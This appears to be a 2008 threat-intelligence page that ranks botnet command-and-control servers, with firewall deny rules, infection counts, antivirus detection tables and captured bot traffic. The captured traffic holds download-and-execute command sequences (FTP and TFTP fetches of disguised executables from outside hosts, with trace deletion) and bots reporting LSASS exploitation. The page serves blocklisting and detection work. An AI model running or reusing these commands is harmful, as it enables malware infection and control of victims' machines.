Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Sun Sep 7 08:32:45 2008

Priority 100	TCP Ports 65520 65520 190 65520 194 65520 67 65520 69 65520 208 65520 77 65520 72 65520 217 65520 24 65520 216 65520 122 65520 218 65520 75	Filter deny ip host 210.245.211.011 any log ! 596 infects 06/28/08 to 08/30/08 romlox.net	ISP kingdom - internet access
Clients 596	hong kong	Activity	Domain romlox.net

Chatter Example

Client: NICK nwusuwdbUSER q020500 . . :-
Client: Service Pack 2JOIN &virtu
Server: :* PRIVMSG nwusuwdb :!get...
Client: GET /~grander/unpr.exe HTTP/1.0User-Agent: DownloadHost:...
Server: GET /17PHolmes.cmt HTTP/1.0User-Agent: TESTHost:...
Server: PONG :i
Client: JOIN &virtu
Server: PONG :i
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.ULPM.Gen
Authentium	Heuristic-166!Eldorado
Avast	_Agent-ZII
AVG	Downloader.Small.CJS
BitDefender	Dropper.RZF
CAT-QuickHeal	TrojanDropper.Small.bkz
ClamAV	MISSED
DrWeb	MulDrop.15779
eSafe	MISSED
eTrust-Vet	Multidropper.DB
Ewido	Dropper.Small.bkz
FileAdvisor	MISSED
Fortinet	Small.BKZ!tr
F-Prot	Heuristic-166!Eldorado
F-Secure	Trojan-Dropper.Small.bkz
Ikarus	Trojan-Dropper.Small.bkz
Kaspersky	Trojan-Dropper.Small.bkz
McAfee	MISSED
Microsoft	TrojanDownloader_Matcash.F
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	Undef.ipp
Sophos	MalDownLdr-O
Sunbelt	MISSED
Symantec	Dropper
TheHacker	MISSED
VBA32	Trojan-Dropper.Small.bkz
VirusBuster	MISSED
Webwasher Gateway	Crypt.ULPM.Gen

Priority 100	TCP Ports 7000 7000 85 7000 218	Filter deny ip host 211.096.097.044 any log ! 551 infects 04/27/08 to 05/12/08 cnuninet.net	ISP china united telecommunications corporation
Clients 551	china	Activity	Domain cnuninet.net

Chatter Example

Client: USER a
Client: PASS a
Client: PASS a
Server: RETR msnnmaneger.exe
Client: PASS saad
Client: NICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Win-Privateexeprotector.199884
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	_Kolab-S
AVG	Dropper.Delf.ACL
BitDefender	Virtob.2.Dam
CAT-QuickHeal	I-Kolab.ep
ClamAV	Kolab-111
DrWeb	IRC.Bot
eSafe	MISSED
eTrust-Vet	ForBot.VD
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Kolab.EP!tr
F-Prot	Zlob.CWW
F-Secure	SdBot.CJU
Ikarus	Packer.PrivateExeProtector.A
Kaspersky	MISSED
McAfee	Generic.dx
Microsoft	MISSED
NOD32v2	MISSED
Norman	Smalltroj.DYNC
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	Kolab.rw
VBA32	MISSED
VirusBuster	Agobot.WPDA
Webwasher Gateway	Crypt.XPACK.Gen

Priority 100	TCP Ports 80 80 210	Filter deny ip host 194.054.090.246 any log ! 526 infects 05/29/08 to 08/30/08 monkey.hosting.ua	ISP hosting.ua datacentre allocation
Clients 526	ukraine	Activity	Domain monkey.hosting.ua

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 75.119.114.36:6916
Server: GET /index.php?id=aivywutvsohc&scn=4&inf=0&ver=19&cnt=USA...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Korgo.Gen
AntiVir	Korgo.U
Authentium	Korgo.V
Avast	_Padobot-Q
AVG	Padobot.V
BitDefender	Padobot.M
CAT-QuickHeal	Korgo.V
ClamAV	MISSED
DrWeb	Lsabot
eSafe	Padobot.m
eTrust-Vet	Korgo.V
Ewido	Padobot.m
FileAdvisor	MISSED
Fortinet	Padobot.M!worm
F-Prot	Korgo.V
F-Secure	MISSED
Ikarus	Korgo.S
Kaspersky	Padobot.m
McAfee	Korgo.v
Microsoft	Korgo.V
NOD32v2	MISSED
Norman	Korgo.AL
Panda	Korgo.U.worm
Prevx1	MISSED
Rising	MISSED
Sophos	Korgo-T
Sunbelt	Korgo
Symantec	Korgo.V
TheHacker	Korgo.V
VBA32	Padobot.m
VirusBuster	Korgo.V
Webwasher Gateway	MISSED

Priority 100	TCP Ports 13001 12351	Filter deny ip host 067.149.121.039 any log ! 378 infects 08/11/08 to 08/16/08 wideopenwest.com	ISP wideopenwest ohio
Clients 378	united states	Activity	Domain wideopenwest.com

Chatter Example

Client: echo open 91.66.175.252 8086>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>echo binary>>.pif...
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `fqslrdflUSER `fqslrdfl 0 0 :`fqslrdfl
Client: JOIN #.has hs
Client: USERHOST `fqslrdflJOIN #.has hsUSERHOST `fqslrdflJOIN #.has...
Client: JOIN #.sd
Server: :`fqslrdfl!~fqslrdfl@192.168.1.90 JOIN :#.sd:aaa.40796.com 353...
Server: PONG :aaa.40796.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRSpy.Games.A
Authentium	STZ_like!Generic
Avast	MISSED
AVG	PolyCrypt
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	STZ_like!Generic
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Spy.Games.A

Priority 100	TCP Ports 443 443 85	Filter deny ip host 217.170.244.002 any log ! 311 infects 03/11/08 to 07/20/08 -	ISP ndermarrja telekomunikuese ktdn-ads
Clients 311	serbia and montenegro	Activity	Domain -

Chatter Example

Server: echo open 85.127.158.6 14674>o&echo USER a>>o&echo a>>o&echo...
Client: USER a
Server: 331 Password required
Client: PASS a
Server: 230 User logged in.
Server: RETR resource32w.exe
Server: 150 Opening BINARY mode data connection
Client: NICK [SOUL]541264USER aeshsrej 0 0 :[SOUL]541264
Server: :irc.celestial.org NOTICE AUTH :*** Looking up your...
Server: :irc.celestial.org NOTICE [SOUL]541264 :*** If you are having...
Server: PONG :FF20F9C9
Client: JOIN #hell troopers
Client: USERHOST [SOUL]541264MODE [SOUL]541264 +ixJOIN #hell...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	SdBo.100864.22
Authentium	Sdbot.OKR
Avast	_Trojano-3403
AVG	IRCBackDoor.SdBot.OZG
BitDefender	Rbot.GNN
CAT-QuickHeal	Rbot.gen
ClamAV	MISSED
DrWeb	HLLW.MyBot.based
eSafe	Rbot
eTrust-Vet	Rbot.EDK
Ewido	Rbot
FileAdvisor	MISSED
Fortinet	RBot!tr.bdr
F-Prot	Sdbot.OKR
F-Secure	MISSED
Ikarus	Rbot
Kaspersky	Rbot.gen
McAfee	Sdbot.gen.x
Microsoft	Rbot!DF7F
NOD32v2	MISSED
Norman	Spybot.AADO
Panda	Sdbot.FRD.worm
Prevx1	MISSED
Rising	MISSED
Sophos	Rbot-BAB
Sunbelt	Rbot.ic
Symantec	Spybot.Worm
TheHacker	BackdoorRbot.gen
VBA32	Rbot.gen
VirusBuster	RBot.DBI
Webwasher Gateway	MISSED

Priority 100	TCP Ports 9890 9890 194 9890 69 9890 210 9890 208 9890 149	Filter deny ip host 069.042.216.090 any log ! 259 infects 03/31/08 to 08/13/08 awknet.com	ISP awknet communications llc
Clients 259	united states	Activity	Domain awknet.com

Chatter Example

Client: USER a
Client: PASS a
Server: RETR igxdfdfds.com
Client: NICK X-jwdwvlUSER X-jwdwvl 0 0 :X-jwdwvl
Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
Client: JOIN ##X## Xkey
Server: :X-jwdwvl!X-jwdwvl@192.168.1.14 JOIN :##x##:irc.foonet.com 332...
Client: USERHOST X-jwdwvlJOIN ##X## XkeyUSERHOST X-jwdwvlJOIN ##X##...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.TPM.Gen
Authentium	MISSED
Avast	MISSED
AVG	RBot.FA
BitDefender	DeepScan_Generic.Sdbot.EE8FDC31
CAT-QuickHeal	SdBot.gen
ClamAV	PUA.Packed.Themida
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	SDBot.gen8
Ikarus	Generic.Sdbot
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	SDBot.gen8
Panda	MISSED
Prevx1	Generic.Malware
Rising	MISSED
Sophos	SusComPack
Sunbelt	MISSED
Symantec	MISSED
TheHacker	Behav-Heuristic-064
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.TPM.Gen

Priority 100	TCP Ports 6667 6668 7000 3921	Filter deny ip host 063.173.172.098 any log ! 231 infects 03/14/08 to 08/22/08 -	ISP splk_tele yemen
Clients 231	yemen	Activity	Domain -

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR Tilesys.com
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK ZI-344148202USER epeapzcwyj 0 0 :ZI-344148202
Client: USERHOST ZI-344148202
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...
Client: MODE ZI-344148202 +x+iJOIN #cc dcpassUSERHOST ZI-344148202MODE...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.NSPI.Gen
Authentium	Threat-HLLIN-Slipper-based!Maximus
Avast	MISSED
AVG	RBot.KA
BitDefender	GenPack_Generic.Sdbot.943E3509
CAT-QuickHeal	Rbot.aus
ClamAV	PUA.Packed.NPack-3
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Threat-HLLIN-Slipper-based!Maximus
F-Secure	Rbot.aus
Ikarus	Packed.Klone.af
Kaspersky	Rbot.aus
McAfee	Sdbot.worm
Microsoft	MISSED
NOD32v2	MISSED
Norman	Suspicious_N.gen
Panda	MISSED
Prevx1	MISSED
Rising	Rbot.GEN
Sophos	MalPacker
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	Behav-Heuristic-063
VBA32	Rbot.aus
VirusBuster	PackedNSPack
Webwasher Gateway	Crypt.NSPI.Gen

Priority 100	TCP Ports 7000 8885	Filter deny ip host 222.177.011.165 any log ! 216 infects 05/12/08 to 06/06/08 -	ISP renhexiaoxue
Clients 216	china	Activity	Domain -

Chatter Example

Client: USER a
Client: PASS a
Server: RETR msnmanegers.exe
Client: PASS saad
Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...
Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...
Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Kolab.200441
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Packer.PrivateExeProtector.A
CAT-QuickHeal	I-Kolab.re
ClamAV	MISSED
DrWeb	IRC.Bot
eSafe	MISSED
eTrust-Vet	ForBot.VC
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Zlob.CWP
F-Secure	Kolab.qa
Ikarus	Packer.PrivateExeProtector.A
Kaspersky	Kolab.qa
McAfee	Generic.dx
Microsoft	Ircbrute
NOD32v2	Kolab.QW
Norman	Smalltroj.DVMM
Panda	MISSED
Prevx1	SPYBOTAX.99328
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	Kolab.re
VBA32	Kolab.qa
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 100	TCP Ports 9890 9890 69	Filter deny ip host 069.042.216.108 any log ! 210 infects 08/25/08 to 08/30/08 awknet.com	ISP awknet communications llc
Clients 210	united states	Activity	Domain awknet.com

Chatter Example

Client: USER a
Client: PASS a
Server: RETR igxdfdfds.com
Client: NICK X-lgsohfkUSER X-lgsohfk 0 0 :X-lgsohfk
Server: :dsl.brasiltelecom.net.br NOTICE AUTH :*** Looking up your...
Client: JOIN ##X## Xkey
Server: :X-lgsohfk!X-lgsohfk@92E0943E.EF61384A.ED5D58B5.IP JOIN...
Client: USERHOST X-lgsohfkJOIN ##X## XkeyUSERHOST X-lgsohfkJOIN ##X##...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.TPM.Gen
Authentium	MISSED
Avast	MISSED
AVG	RBot.FA
BitDefender	DeepScan_Generic.Sdbot.EE8FDC31
CAT-QuickHeal	SdBot.gen
ClamAV	PUA.Packed.Themida
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	SDBot.gen8
Ikarus	Generic.Sdbot
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	SDBot.gen8
Panda	MISSED
Prevx1	Generic.Malware
Rising	MISSED
Sophos	SusComPack
Sunbelt	MISSED
Symantec	MISSED
TheHacker	Behav-Heuristic-064
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.TPM.Gen

Priority 100	TCP Ports 12351 13001	Filter deny ip host 024.192.170.232 any log ! 129 infects 08/09/08 to 08/11/08 wideopenwest.com	ISP wideopenwest michigan
Clients 129	canada	Activity	Domain wideopenwest.com

Chatter Example

Client: echo open 218.221.44.95 16152>.pif C:\\WINDOWS\\system32>
Client: echo user a a>>.pif C:\\WINDOWS\\system32>
Client: echo binary>>.pif C:\\WINDOWS\\system32>
Client: echo GET exlorers.exe>>.pif C:\\WINDOWS\\system32>
Client: echo bye>>.pif C:\\WINDOWS\\system32>
Client: echo @echo off >c.batC:\\WINDOWS\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
Client: echo exlorers.exe >>c.batC:\\WINDOWS\\system32>
Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
Client: USER a
Client: PASS a
Server: RETR exlorers.exe
Client: NICK `oxaogankUSER `oxaogank 0 0 :`oxaogank
Client: JOIN #.has hs
Client: USERHOST `oxaogankJOIN #.has hsUSERHOST `oxaogankJOIN #.has...
Client: JOIN #.sd
Server: :`oxaogank!~oxaogank@192.168.1.193 JOIN :#.sd:aaa.18083.com 332...
Client: PRIVMSG #.lagja :lsass: exploited (127.218.16.247)
Client: PRIVMSG #.lagja :ftp: 192.168.1.193 on 70
Client: PRIVMSG #.lagja :lsass: exploited (127.211.129.136)
Client: PRIVMSG #.lagja :ftp: 192.168.1.193 on 70
Client: PRIVMSG #.lagja :lsass: exploited (127.3.219.84)
Client: PRIVMSG #.lagja :ftp: 192.168.1.193 on 70
Client: PRIVMSG #.lagja :lsass: exploited (127.17.94.39)
Client: PRIVMSG #.lagja :ftp: 192.168.1.193 on 70

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Virut.7116
Avast	_VanBot-HR
AVG	Virut
BitDefender	Wootbot.ABQ
CAT-QuickHeal	Virut.Z
ClamAV	Virut-17
DrWeb	Virut.30
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Backdoor2.BHJW
F-Secure	Virut.av
Ikarus	Virut.n
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Wootbot.EE
NOD32v2	Virut.AV
Norman	Virut.AG
Panda	Virutas.Z
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
VBA32	Virut.2
VirusBuster	Wootbot.YZ
Webwasher Gateway	Virut.AX

Priority 100	TCP Ports 80 65520 211 65520 209 65520 210 80 211 65520 69 65520 217 80 64 65520 222 80 217	Filter deny ip host 085.114.137.060 any log ! 127 infects 04/10/08 to 06/03/08 fastit.net	ISP fastit
Clients 127	germany	Activity	Domain fastit.net

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 119.17.99.246:2733

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Virut.X
Authentium	Korgo.V
Avast	_Padobot-Q
AVG	Korgo.A
BitDefender	Padobot.BV.Dam
CAT-QuickHeal	Virut.F
ClamAV	Padobot.M
DrWeb	Virut.5
eSafe	Virut.gen
eTrust-Vet	Virut.10683
Ewido	Padobot.m
FileAdvisor	MISSED
Fortinet	MetaCrypt.1
F-Prot	Korgo.V
F-Secure	Horst.gen33
Ikarus	Korgo.S
Kaspersky	Padobot.m
McAfee	Virut.gen
Microsoft	Virut.L
NOD32v2	Virut.Q
Norman	Horst.gen33
Panda	Virutas.gen
Prevx1	MISSED
Rising	Virut.GEN
Sophos	Vetor-A
Sunbelt	MISSED
Symantec	Virut.U
TheHacker	Virut.gen2
VBA32	Virut.q
VirusBuster	Virut.Gen.5
Webwasher Gateway	Virut.X

Priority 100	TCP Ports 13001 12351	Filter deny ip host 190.174.067.119 any log ! 115 infects 08/01/08 to 08/02/08 -	ISP -
Clients 115	-	Activity	Domain -

Chatter Example

Client: echo open 60.236.103.172 2564>.pif C:\\WINDOWS\\system32>
Client: echo user a a>>.pif C:\\WINDOWS\\system32>
Client: echo binary>>.pif C:\\WINDOWS\\system32>
Client: echo GET ctfmom.exe>>.pif C:\\WINDOWS\\system32>
Client: echo bye>>.pif C:\\WINDOWS\\system32>
Client: echo @echo off >c.batC:\\WINDOWS\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
Client: echo ctfmom.exe >>c.batC:\\WINDOWS\\system32>
Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
Client: USER a
Client: PASS a
Server: RETR ctfmom.exe
Client: NICK `vzudmcaUSER `vzudmca 0 0 :`vzudmca
Client: JOIN #.has hs
Server: :`vzudmca!~vzudmca@192.168.1.25 JOIN :#.has:aaa.25740.com 332...
Client: USERHOST `vzudmcaJOIN #.has hsUSERHOST `vzudmcaJOIN #.has...
Client: PRIVMSG #.lagja :lsass: exploited (127.80.234.142)
Client: PRIVMSG #.lagja :ftp: 192.168.1.25 on 1764
Client: PRIVMSG #.lagja :lsass: exploited (127.75.182.100)
Client: PRIVMSG #.lagja :ftp: 192.168.1.25 on 1764
Client: PRIVMSG #.lagja :lsass: exploited (127.32.175.109)
Client: PRIVMSG #.lagja :ftp: 192.168.1.25 on 1764
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.179.21.111)PRIVMSG #.lagja...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	WootBot.87882
Authentium	MISSED
Avast	MISSED
AVG	PolyCrypt
BitDefender	GenPack_Generic.Sdbot.4F05FAA9
CAT-QuickHeal	Wootbot.gen
ClamAV	MISSED
DrWeb	Packed.494
eSafe	Wootbot.gen
eTrust-Vet	ForBot.WC
Ewido	Wootbot
FileAdvisor	MISSED
Fortinet	WootBot!tr.bdr
F-Prot	MISSED
F-Secure	Wootbot.gen
Ikarus	Wootbot
Kaspersky	Wootbot.gen
McAfee	MISSED
Microsoft	Wootbot
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	BackdoorWootbot.gen
VBA32	Wootbot.gen
VirusBuster	MISSED
Webwasher Gateway	WootBot.87882

Priority 100	TCP Ports 13001 12351	Filter deny ip host 069.247.147.113 any log ! 110 infects 06/27/08 to 07/04/08 comcast.net	ISP comcast cable communications inc
Clients 110	united states	Activity	Domain comcast.net

Chatter Example

Client: echo open 83.135.227.132 4873>.pif C:\\WINDOWS\\system32>
Client: echo user a a>>.pif C:\\WINDOWS\\system32>
Client: echo binary>>.pif C:\\WINDOWS\\system32>
Client: echo GET ctfmom.exe>>.pif C:\\WINDOWS\\system32>
Client: echo bye>>.pif C:\\WINDOWS\\system32>
Client: echo @echo off >c.batC:\\WINDOWS\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
Client: echo ctfmom.exe >>c.batC:\\WINDOWS\\system32>
Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
Client: USER a
Client: PASS a
Server: RETR ctfmom.exe
Client: NICK `kowkqhvrUSER `kowkqhvr 0 0 :`kowkqhvr
Client: JOIN #.has hs
Server: :`kowkqhvr!~kowkqhvr@192.168.1.37 JOIN :#.has:aaa.39213.com 332...
Client: USERHOST `kowkqhvrJOIN #.has hsUSERHOST `kowkqhvrJOIN #.has...
Client: JOIN #.r
Server: :`kowkqhvr!~kowkqhvr@192.168.1.37 JOIN :#.r:aaa.39213.com 332...
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	WootBot.87882
Authentium	MISSED
Avast	MISSED
AVG	PolyCrypt
BitDefender	GenPack_Generic.Sdbot.4F05FAA9
CAT-QuickHeal	Wootbot.gen
ClamAV	MISSED
DrWeb	Packed.494
eSafe	Wootbot.gen
eTrust-Vet	ForBot.WC
Ewido	Wootbot
FileAdvisor	MISSED
Fortinet	WootBot!tr.bdr
F-Prot	MISSED
F-Secure	Wootbot.gen
Ikarus	Wootbot
Kaspersky	Wootbot.gen
McAfee	MISSED
Microsoft	Wootbot
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	BackdoorWootbot.gen
VBA32	Wootbot.gen
VirusBuster	MISSED
Webwasher Gateway	WootBot.87882

Priority 100	TCP Ports 7000	Filter deny ip host 209.250.232.240 any log ! 109 infects 05/19/08 to 06/10/08 justedge.net	ISP justedge networks inc
Clients 109	united states	Activity	Domain justedge.net

Chatter Example

Client: USER a
Client: PASS a
Server: RETR hotefix.exe
Client: PASS saad
Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
Client: NICK GOGO9-sdoxmpjUSER GOGO9-sdoxmpj 0 0 :GOGO9-sdoxmpj
Server: :irc.priv8net.com NOTICE AUTH :*** Couldn\\'t resolve your...
Client: JOIN #scop# servec
Client: USERHOST GOGO9-sdoxmpjJOIN #scop# servecUSERHOST...
Server: :GOGO9-sdoxmpj!GOGO9-sdox@192.168.1.105 JOIN...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	_Agent-LKZ
AVG	MISSED
BitDefender	Packer.PrivateExeProtector.A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Packer.PrivateExeProtector.A
Kaspersky	Heur.Generic
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	SusUnkPacker
Sunbelt	MISSED
Symantec	Packed.Generic.52
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 89	TCP Ports 13001 12351	Filter deny ip host 094.036.065.059 any log ! 86 infects 08/04/08 to 08/04/08 -	ISP -
Clients 86	-	Activity	Domain -

Chatter Example

Client: echo open 202.70.232.58 1532>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `hptpvkyiUSER `hptpvkyi 0 0 :`hptpvkyi
Client: JOIN #.has hs
Server: :`hptpvkyi!~hptpvkyi@192.168.1.18 JOIN :#.has:aaa.61245.com 332...
Client: USERHOST `hptpvkyiJOIN #.has hsUSERHOST `hptpvkyiJOIN #.has...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Virut.AX
Authentium	MISSED
Avast	_Agent-AABV
AVG	PSW.Generic6.QSP
BitDefender	Generic.343948
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.av
Kaspersky	MISSED
McAfee	MISSED
Microsoft	Wootbot.EG
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	SusUnkPacker
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Virut.AX

Priority 80	TCP Ports 3838 9928 72 2938 2293 7382 7763 9283 3938 3240 75 8492 7382 72 2938 210 7575	Filter deny ip host 072.010.172.218 any log ! 78 infects 03/14/08 to 08/24/08 webdesignpro.org	ISP globotech communications
Clients 78	canada	Activity	Domain webdesignpro.org

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 218.86.236.21 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 218.86.236.21 get dllhost.exe wins\\DLLHOST.EXE
Client: USER wqxtha wqxtha wqxtha :wcgiqpactwttffqy
Client: NICK BOwPfQth
Server: PONG :2D7EF205
Client: MODE BOwPfQth +xi
Client: JOIN ##pi## USERHOST BOwPfQth
